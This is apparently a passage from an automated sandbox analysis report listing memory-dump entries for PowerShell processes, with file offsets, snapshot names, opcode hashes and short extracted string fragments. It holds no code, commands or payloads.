                                                • Instruction Fuzzy Hash: CBB1E83060DA4D4FEB68DF28D8557E93BD1FF59310F04426EE84DC7296DA34A945CB82
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1954442618.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c2bd8f9c59d64dae337474785df1f91db42dd205b13fb5fc1352218579226f3e
                                                • Instruction ID: 47e89e22c317f4079b4d08aa8953daef9240f4b29b05c1961044793cd8d22566
                                                • Opcode Fuzzy Hash: c2bd8f9c59d64dae337474785df1f91db42dd205b13fb5fc1352218579226f3e
                                                • Instruction Fuzzy Hash: 29821731A2FA895FEBA5DBA884A49647BE1FF52304F1900FED05DCB1E3DA25AC45C700
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1954442618.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc174bc84ae023e700efd9481ef8a8d7692f939918c1054b67b0a5044245c334
                                                • Instruction ID: 85dd6fcdab45111a925162cb2fa3a4b417242aa84705521ad41afefc50582c86
                                                • Opcode Fuzzy Hash: fc174bc84ae023e700efd9481ef8a8d7692f939918c1054b67b0a5044245c334
                                                • Instruction Fuzzy Hash: E2225722B1FA8D2FE766976C58A56B53BD1EF52210F0901FFE49DC70E3EA18AD058341
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1949735839.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ada6fd7b052d4bb1b1430aa40d5ce6287cc3b75d791ba9576f592987d56d28c
                                                • Instruction ID: 80f3bc8635620bc07cc77ffa5a0bd96525be7df3a411d3bcc6203407c0af86fb
                                                • Opcode Fuzzy Hash: 3ada6fd7b052d4bb1b1430aa40d5ce6287cc3b75d791ba9576f592987d56d28c
                                                • Instruction Fuzzy Hash: FB328130A18A4D8FDF98DF9CC4A5AA97BE1FFA8301F25416ED009D7695CB35E841CB81
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1957587871.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9bb20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9127541dbf79eac7831b86dd88dcb629c36fb3ae15f9f27281729d6966f56b69
                                                • Instruction ID: 55bbc0e12848b3031ecc6839c307b57060a58e170830d20dc4d9a87de047a273
                                                • Opcode Fuzzy Hash: 9127541dbf79eac7831b86dd88dcb629c36fb3ae15f9f27281729d6966f56b69
                                                • Instruction Fuzzy Hash: 1EF13A32A0EBC90FE765976888615687BE1FF65614F0901FED4ACCB1E3DE28AD45C341
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1957587871.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9bb20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 820d792ffa94b90e322ddc180bc56a2121c853eeb83639065bdf26eb8c8c791c
                                                • Instruction ID: ddf726a14b4bd3476656fd018b830bcc19499fc1e00c2077595883e58d65ca92
                                                • Opcode Fuzzy Hash: 820d792ffa94b90e322ddc180bc56a2121c853eeb83639065bdf26eb8c8c791c
                                                • Instruction Fuzzy Hash: DBE15A32B0EB890FEBA9D76848612787BE2FF65614F5901BED06CC71E3DE18AC458341
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1957587871.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9bb20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c27653a0437023928f4a105a6e36a42d2d064907cc591d45e623407e8c9f9fc8
                                                • Instruction ID: 00153e4475f8c66365e3167c388f63f35e56652a6ee6164c4718562aaf68d69d
                                                • Opcode Fuzzy Hash: c27653a0437023928f4a105a6e36a42d2d064907cc591d45e623407e8c9f9fc8
                                                • Instruction Fuzzy Hash: E5D16722B0EB890FE7669B6848655B47BE1FF66714B4A01FBD06CCB1E3D918AD05C381
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1954442618.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b13cdf4d9f20426f31d17bafdf0af6104e5710c474bcee6a2a1a1335012d0686
                                                • Instruction ID: bafc7a5633e64a515474b1eecc2c9d30f3c20675675ae332f54dcb0e9a180ab2
                                                • Opcode Fuzzy Hash: b13cdf4d9f20426f31d17bafdf0af6104e5710c474bcee6a2a1a1335012d0686
                                                • Instruction Fuzzy Hash: 13D14531B1EA8D5FEBA5AB6848A99B57BE1EF51310B0901FFD05CCB0E3DA18A9058351
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1957587871.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9bb20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8808f54fe7d25c236a6e83f66a1eac7e191127c84ddbf426d368bb4e8fef8676
                                                • Instruction ID: f87c2ffdb22167326ad43f5edff70846bc16799cd76cc68398c03d7432a4c025
                                                • Opcode Fuzzy Hash: 8808f54fe7d25c236a6e83f66a1eac7e191127c84ddbf426d368bb4e8fef8676
                                                • Instruction Fuzzy Hash: 96610731A0FBC94FDB629B7898615A47FE0EF63214B0A01FBD498CB0E3DA196909C351
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1954442618.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40f83fb9160c2a392bf06f6a7d597bc1258b01a307dc61f84ca6726852df80b5
                                                • Instruction ID: 07f58e7bfc8c8002bb0924fafb00cc84faec09c6788f03c8c53bb4d8e6ddbadc
                                                • Opcode Fuzzy Hash: 40f83fb9160c2a392bf06f6a7d597bc1258b01a307dc61f84ca6726852df80b5
                                                • Instruction Fuzzy Hash: 20210922B2FA8E2BF3B996AC54B917467C2EF91260B5900BAD05DC31E7ED19AC014341
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1949735839.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                • Instruction Fuzzy Hash: 3C0124B631021B8BEF2859AA940017AB79ADBC1622F14843FD88DCA650DA32C845CB60
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d6413568a9627d1891ea77e6a3c86a47f03797450cfd93f9076e383170a685b
                                                • Instruction ID: c6f4bbdd42fe19070b062936d6fa313404a86d7458ebc20c7c6c9119cc9d6b40
                                                • Opcode Fuzzy Hash: 6d6413568a9627d1891ea77e6a3c86a47f03797450cfd93f9076e383170a685b
                                                • Instruction Fuzzy Hash: 84E0DF8160E7D01FCB1662202C209E96EA18B8316474501E7E646CF293C8141D48D3F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,S$l$,S$l$4'dq$4'dq$4'dq$4'dq$tPdq$tPdq$xS$l$$dq
                                                • API String ID: 0-3265367902
                                                • Opcode ID: b40e50b33ad3605af4ccb3a15c992e184d1d8e91e32fe47fe6ece4209cf93dc5
                                                • Instruction ID: 3c31e62259306b8a3200ebc3a07f1139826064b58482afff60c4597adbf4d46a
                                                • Opcode Fuzzy Hash: b40e50b33ad3605af4ccb3a15c992e184d1d8e91e32fe47fe6ece4209cf93dc5
                                                • Instruction Fuzzy Hash: C4D139F1B04706AFDF258B68881176BBBE2BF86311F14807AD94DCB651DB31C941C791
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                • API String ID: 0-4287419856
                                                • Opcode ID: 06ed2ffd49cbb1f30a89b12f6c1352abef27576f8ef97d6a0540f9a3dabefddb
                                                • Instruction ID: 2df682cca99248ac42f9aa78dafd0e3473f4e83486752d7db9c45c0350a01339
                                                • Opcode Fuzzy Hash: 06ed2ffd49cbb1f30a89b12f6c1352abef27576f8ef97d6a0540f9a3dabefddb
                                                • Instruction Fuzzy Hash: AAA12AF17052169FEF269A39D85076ABBE6AF85211F24807AD80DCB6C1DB31C8D1C7A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                • API String ID: 0-4287419856
                                                • Opcode ID: 7c3f3ab2d99070ea2b6abb1ef8af8625edb5598a66eff4b5128a38a92dadb4b8
                                                • Instruction ID: d1a5465aa820d364f9abcd02b451f38d5c1c4112170419329ccaa2d3f35f0d1a
                                                • Opcode Fuzzy Hash: 7c3f3ab2d99070ea2b6abb1ef8af8625edb5598a66eff4b5128a38a92dadb4b8
                                                • Instruction Fuzzy Hash: 0DB1A2B1B1421ADFEF15CF78C4446AAB7A2BF85311F14E476D81D8B640DB31D981CBA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$84"l$tPdq$tPdq$$dq$(jq$(jq$(jq
                                                • API String ID: 0-1663526480
                                                • Opcode ID: 24e321d98db11392c07e0cd108c76b646402aa6d295843512d5ad0fbfecfe87c
                                                • Instruction ID: 4c9c7d0221284cddb436542b78a9f2392ec5ff50ad7fa589509c9073eb43037a
                                                • Opcode Fuzzy Hash: 24e321d98db11392c07e0cd108c76b646402aa6d295843512d5ad0fbfecfe87c
                                                • Instruction Fuzzy Hash: DC61A1F1B21206DFEF24CE15C542B6AB7E6AF89711F198079E80A6B294D771DC40CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$tPdq$tPdq$$dq$$dq$$dq$$dq
                                                • API String ID: 0-4017470009
                                                • Opcode ID: f8514a1ae5f2501c408bd84c839a6ec683d50c394531e014ca1015d296cd99ed
                                                • Instruction ID: 6b743fbf9b89f1584385ecb7e232b3aab177bf586964caa1adb23355072a82b9
                                                • Opcode Fuzzy Hash: f8514a1ae5f2501c408bd84c839a6ec683d50c394531e014ca1015d296cd99ed
                                                • Instruction Fuzzy Hash: 61A127F17043159FEF249A69D8017A7BBE6AFC6311F14847AD84ACB391DA31C845C7A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f$l$(f$l$(f$l$(f$l$4'dq$4'dq$4!l$4!l
                                                • API String ID: 0-3778388573
                                                • Opcode ID: ce33e59cbf049eb4f7ead2cebf32a15e1ae1cccc40b0cebbd3cb7f7d4df1b7c8
                                                • Instruction ID: c397f901f8b65e6d4bc78e57a587cf911cf744a88cf018be38d1b40d01d81b44
                                                • Opcode Fuzzy Hash: ce33e59cbf049eb4f7ead2cebf32a15e1ae1cccc40b0cebbd3cb7f7d4df1b7c8
                                                • Instruction Fuzzy Hash: CA6183F0B00206DBDB18DB68C451A6ABBE7AF89715F14C479D809EB744DB32EC41CB92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$TQiq$TQiq$tPdq$$dq$$dq$$dq
                                                • API String ID: 0-1124355959
                                                • Opcode ID: a26f7fea2cc1782bf1e406433e7c4ec78e6571fbdf058053d90770c8bc42be7d
                                                • Instruction ID: a2839c5a3bf1e54c1df57bfe9215e9ea9fde8b9b2af3fd167bf048bc8d4f2b23
                                                • Opcode Fuzzy Hash: a26f7fea2cc1782bf1e406433e7c4ec78e6571fbdf058053d90770c8bc42be7d
                                                • Instruction Fuzzy Hash: C351F2F172420AEFEF24CE14C5467AAB7B6AF45311F1880BAE80D9B690C775DD90CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$TQiq$TQiq$tPdq$$dq$$dq$$dq
                                                • API String ID: 0-1124355959
                                                • Opcode ID: d8d76350150e1e40faed00c2054175d8cee3c0627d653883a4bbf6e0f793046e
                                                • Instruction ID: f98e5fb897c7e8656b1aa5eede63d942fb922c9006682d5a0dd2e80e1f1280e0
                                                • Opcode Fuzzy Hash: d8d76350150e1e40faed00c2054175d8cee3c0627d653883a4bbf6e0f793046e
                                                • Instruction Fuzzy Hash: A051DFF172420AEFFF24CE05C54676AB3A6AF45311F5880BAE80D9B690C775DD90CBA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$d%jq$d%jq$d%jq$tPdq$$dq
                                                • API String ID: 0-1700238634
                                                • Opcode ID: da249aff8efdf85d974ab0570e93a55ef95aae9292271375b1ec4fa8751ba939
                                                • Instruction ID: e1d61d6698706ff2ae20cc47dad9c3f96787af1811655a0828d06f9b1dc315cc
                                                • Opcode Fuzzy Hash: da249aff8efdf85d974ab0570e93a55ef95aae9292271375b1ec4fa8751ba939
                                                • Instruction Fuzzy Hash: 105104F0B24255DFEF248F14C44276ABBE2AF85254F5880BAE90D9F291DB31DC41CBA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$d%jq$d%jq$d%jq$tPdq$$dq
                                                • API String ID: 0-1700238634
                                                • Opcode ID: b35151a6036964ace65e6e056c0ec50c44627363fe523011715fda2213d2ecd4
                                                • Instruction ID: 9e9a072bf54d84f2bb0c48b1aa431a4970ac47ba2f096372ba14b6eeb6ef2c74
                                                • Opcode Fuzzy Hash: b35151a6036964ace65e6e056c0ec50c44627363fe523011715fda2213d2ecd4
                                                • Instruction Fuzzy Hash: D85106F0B24215EFEF248F15C442B6AB7F6AF45250F5880B6D90DAB291DB31DC40CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq
                                                • API String ID: 0-1592980071
                                                • Opcode ID: c354095f85989728d79ec2c51b44ec454beacef63f72e019cd45e8684575bd52
                                                • Instruction ID: a0659d5b92712b80b146f6179186cd5f7a9bd9eb45184705ed1d38aa3ef74f70
                                                • Opcode Fuzzy Hash: c354095f85989728d79ec2c51b44ec454beacef63f72e019cd45e8684575bd52
                                                • Instruction Fuzzy Hash: E81262B4B0120A9FDB14CB58C441BADFBF2BB89315F54C065E9096B795CB72EC42CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$tPdq$$dq$$dq$$dq
                                                • API String ID: 0-2972037801
                                                • Opcode ID: 18a7fea8546cc8f170f4ed5431a396eac530dbda012a536e4cf2d3d12bc09d67
                                                • Instruction ID: 668f72d2b98c74f54ea087f8d1c8f44130585606f66a417ec593771229658d72
                                                • Opcode Fuzzy Hash: 18a7fea8546cc8f170f4ed5431a396eac530dbda012a536e4cf2d3d12bc09d67
                                                • Instruction Fuzzy Hash: 2661DEF268021AEFFF24CE14C5407BA77A6AF45711F188076E8199B2D1DB71ED80CBA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$t~wq$$dq$$dq$$dq
                                                • API String ID: 0-1268362705
                                                • Opcode ID: 5ce22260b9a0fbf0552040d1f845ed43c504668b2c5502cbb486c74abb8fba10
                                                • Instruction ID: eee4b458cfcfad65239425f91bbce198660d08ee8109c3f1f84e5c39f1df1df3
                                                • Opcode Fuzzy Hash: 5ce22260b9a0fbf0552040d1f845ed43c504668b2c5502cbb486c74abb8fba10
                                                • Instruction Fuzzy Hash: BD5139F1B1424F9FEF155A68881027BBBA7AFC5311F24807AD849DF681DF318941C3A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$84"l$d%jq$d%jq$d%jq$tPdq
                                                • API String ID: 0-3054513741
                                                • Opcode ID: 6ab5ba56f385d429354e35313f1cf9c70794df7fb6913b5cd2a8adbb65f41b9e
                                                • Instruction ID: 0004bee3d20b34503aeec861e78b0268b0bf0181a5564638b2f5c0c88199afa2
                                                • Opcode Fuzzy Hash: 6ab5ba56f385d429354e35313f1cf9c70794df7fb6913b5cd2a8adbb65f41b9e
                                                • Instruction Fuzzy Hash: 4231AFF1B10204AFDB14DF58C841A6ABBE6FB89710F65856AE91DAB344C731DC01CB90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 84"l$XRiq$XRiq$tPdq$$dq
                                                • API String ID: 0-2653940123
                                                • Opcode ID: b05329e6f0496607757b471dd7ee5990c9e96d963413ef2156db03ce6457aaf6
                                                • Instruction ID: b77b41b184bc133195a0bfb0b16226aa7fc53fc6decde8e1cf1538c222b9099a
                                                • Opcode Fuzzy Hash: b05329e6f0496607757b471dd7ee5990c9e96d963413ef2156db03ce6457aaf6
                                                • Instruction Fuzzy Hash: 5741CFB2A44205DFEF24DF44C544AAAFBF2BF45B10F2980BAD8186B291C735DD40CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 84"l$XRiq$XRiq$tPdq$$dq
                                                • API String ID: 0-2653940123
                                                • Opcode ID: 7bc0f84c1ecc0186544ba3b16bd0edb0e1f46369fa94455caf9c39de8916a5a3
                                                • Instruction ID: 5de97e6ce5fa83e9f75457d4d12d2508173b8b1cea79cacdbfa9fffcb9692ca4
                                                • Opcode Fuzzy Hash: 7bc0f84c1ecc0186544ba3b16bd0edb0e1f46369fa94455caf9c39de8916a5a3
                                                • Instruction Fuzzy Hash: 7F419FB2A44205DBEF24DF44C544AAAF7F6BF49B11F29C0BAE8186B291C735DD40CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (odq$(odq$(odq$(odq
                                                • API String ID: 0-2844368422
                                                • Opcode ID: 1fb5a66f0d48a90e42be657e9f536f3c27df0afd0fe936cb41b1f543031885f1
                                                • Instruction ID: 56a3acfc16eade5e91dd5fce35fd6a06cb9f6cc1b87fcab60e12eb581207e83a
                                                • Opcode Fuzzy Hash: 1fb5a66f0d48a90e42be657e9f536f3c27df0afd0fe936cb41b1f543031885f1
                                                • Instruction Fuzzy Hash: 79F138B1714349DFEF158F38C8117AABBA2EF85311F14C47AE94A8B291DB31D841C7A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 84"l$84"l$tPdq$tPdq
                                                • API String ID: 0-2458360423
                                                • Opcode ID: f985e57a9f5c773978e20ce5f04842131500a78446fc6f826471d1a7743827d9
                                                • Instruction ID: 1c0380da3a74793aff0fdbd92ef62c8a302cf7dc4419214ba1aafeadb9f7ca76
                                                • Opcode Fuzzy Hash: f985e57a9f5c773978e20ce5f04842131500a78446fc6f826471d1a7743827d9
                                                • Instruction Fuzzy Hash: 779133B17202169FEF149E69C851B7BBBE6AF85310F28C47AD8099B3C1DA31DD41C7A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$XY$l$XY$l
                                                • API String ID: 0-3438502865
                                                • Opcode ID: 93bf52a8f3816835bb0203fff1179bc587dc1bb93a4bc5b82d4a8a91d0b9c3be
                                                • Instruction ID: c5c03b309db11561fd7816f6814d99f4256324a7a416dd3ed23c0c928350a949
                                                • Opcode Fuzzy Hash: 93bf52a8f3816835bb0203fff1179bc587dc1bb93a4bc5b82d4a8a91d0b9c3be
                                                • Instruction Fuzzy Hash: 3D712BB570835BCFEF198B68D8516AABBA2AFC6311F14C07BD84DCB651DA31C841C7A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq
                                                • API String ID: 0-2296240322
                                                • Opcode ID: 36355a6781f0c77c8d1605acbd5933562bf9f0a06a7d453d1f0d11e41182396b
                                                • Instruction ID: 2d7b127244961c6267a05bb4f2d0b3aebb484cb8b43339c42952c0f2552f04a5
                                                • Opcode Fuzzy Hash: 36355a6781f0c77c8d1605acbd5933562bf9f0a06a7d453d1f0d11e41182396b
                                                • Instruction Fuzzy Hash: 5861E7F1B0421ACFEF158A78C4112ABBBE6AFC6211F24947AC85DC7651DB31C981C7A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f$l$(f$l$(f$l$(f$l
                                                • API String ID: 0-1234685032
                                                • Opcode ID: 22da69ec4758c624d8f817f459b872f6489c5275a4fa309e79587e4803ab1f0e
                                                • Instruction ID: 8d46bc523475b54c260ab0d7c2e51b55aea2758a459a780187e7a7b84b32300d
                                                • Opcode Fuzzy Hash: 22da69ec4758c624d8f817f459b872f6489c5275a4fa309e79587e4803ab1f0e
                                                • Instruction Fuzzy Hash: 2F712BF0A102099BEB14CF58C491BAAFBE6ABC9315F14C06DD909AB755CB72E841CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2125229264.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd